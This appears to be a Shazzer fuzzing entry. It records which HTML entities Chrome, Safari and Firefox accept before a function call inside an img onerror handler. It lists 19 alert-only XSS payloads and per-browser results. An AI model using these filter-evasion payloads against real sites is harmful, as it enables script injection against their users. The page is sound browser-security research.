Entities allowed before function calls

This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are still a bit inconsistent because I currently wait for page load.

Created by: hackvertor

Created on: 7/2/2024, 11:22:28 AM

Updated on: 7/4/2024, 8:39:28 PM

Vector type: XSS

Template used:
<img src=data: onerror="$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
<img src=data: onerror="&ensp;alert('&#38;ensp;')">
<img src=data: onerror="&Tab;alert('&#38;Tab;')">
<img src=data: onerror="&emsp;alert('&#38;emsp;')">
<img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
<img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">
<img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
<img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
<img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
<img src=data: onerror="&plus;alert('&#38;plus;')">
<img src=data: onerror="&semi;alert('&#38;semi;')">
<img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
<img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
<img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
<img src=data: onerror="&excl;alert('&#38;excl;')">
<img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
<img src=data: onerror="&numsp;alert('&#38;numsp;')">
<img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
<img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">

Fuzz results

Chrome 126.0.0.0 desktop macOS 10.15.7
Found 19 results
Data:
&emsp;
&emsp13;
&emsp14;
&ensp;
&excl;
&hairsp;
&MediumSpace;
&nbsp;
&NewLine;
&NonBreakingSpace;
&numsp;
&plus;
&puncsp;
&semi;
&Tab;
&ThickSpace;
&thinsp;
&ThinSpace;
&VeryThinSpace;

Safari 18.0 desktop macOS 10.15.7
Found 19 results
Data:
&emsp;
&emsp13;
&emsp14;
&ensp;
&excl;
&hairsp;
&MediumSpace;
&nbsp;
&NewLine;
&NonBreakingSpace;
&numsp;
&plus;
&puncsp;
&semi;
&Tab;
&ThickSpace;
&thinsp;
&ThinSpace;
&VeryThinSpace;

Firefox 127.0 desktop macOS 10.15
Found 19 results
Data:
&emsp;
&emsp13;
&emsp14;
&ensp;
&excl;
&hairsp;
&MediumSpace;
&nbsp;
&NewLine;
&NonBreakingSpace;
&numsp;
&plus;
&puncsp;
&semi;
&Tab;
&ThickSpace;
&thinsp;
&ThinSpace;
&VeryThinSpace;